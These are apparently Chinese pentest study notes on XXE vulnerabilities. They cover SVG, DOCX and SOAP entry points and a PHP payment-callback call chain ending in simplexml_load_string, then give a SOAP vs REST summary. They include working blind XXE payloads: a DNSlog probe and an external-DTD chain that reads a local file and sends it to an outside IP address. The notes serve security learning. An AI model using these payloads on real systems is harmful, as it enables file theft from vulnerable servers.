#黑盒功能点案例

1、不安全的图像读取-SVG

2、不安全的文档转换-DOCX

3、不安全的传递服务-SOAP

SOAP 的典型使用场景

✅ 适合 SOAP 的情况：

• 需要严格的数据契约（如金融交易、医疗数据交换）。

• 需要高级安全控制（如 WS-Security 加密）。

• 依赖复杂事务（如分布式系统调用）。

❌ 不适合 SOAP 的情况：

• 需要轻量级、快速开发的 API（如移动端 App）。

• 对性能要求高（如高并发 Web 服务）。

• 不需要复杂事务管理的简单 CRUD 操作。

• 
  

不管是上传还是文件操作，xxe影响的文件的格式后缀要知道有哪几种

 

 

#白盒函数点案例：

1、漏洞函数simplexml_load_string

2、pe_getxml函数调用了漏洞函数

3、wechat_getxml调用了pe_getxml

4、notify_url调用了wechat_getxml

访问notify_url文件触发wechat_getxml函数,构造Paylod测试

 

先尝试读取文件，无回显后带外测试：

<?xml version="1.0" ?>

<!DOCTYPE test [

<!ENTITY % file SYSTEM "http://1uwlwv.dnslog.cn">

%file;

]>

<root>&send;</root>

 

然后带外传递数据解决无回显：

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY % file SYSTEM "file:///d:/1.txt">

<!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">

%remote;

%all;

]>

<root>&send;</root>

 

test.dtd：

<!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

 

#实际复盘：

https://xz.aliyun.com/news/16463

https://mp.weixin.qq.com/s/biQgwMU2v1I92CsDOFRB7g

https://mp.weixin.qq.com/s/1pj9sbwKT6RjIiLgNC7-Gg

https://mp.weixin.qq.com/s/Mgd91_Iie-wZU7MqP5oCXw

总结

• SOAP 是一种 基于 XML 的协议，适合 企业级高安全性、强类型 的应用。

• REST 更轻量，适合大多数现代 Web 和移动应用。

• SOAP 依赖 WSDL 定义接口，支持 WS- 扩展*（如安全、事务）。

• 由于 XML 冗长，SOAP 在性能上不如 REST（JSON），但在某些行业（如金融）仍是标准。

如果你在开发 银行、医疗、政府系统，SOAP 可能是更好的选择；如果是 互联网应用，REST 或 GraphQL 更常见。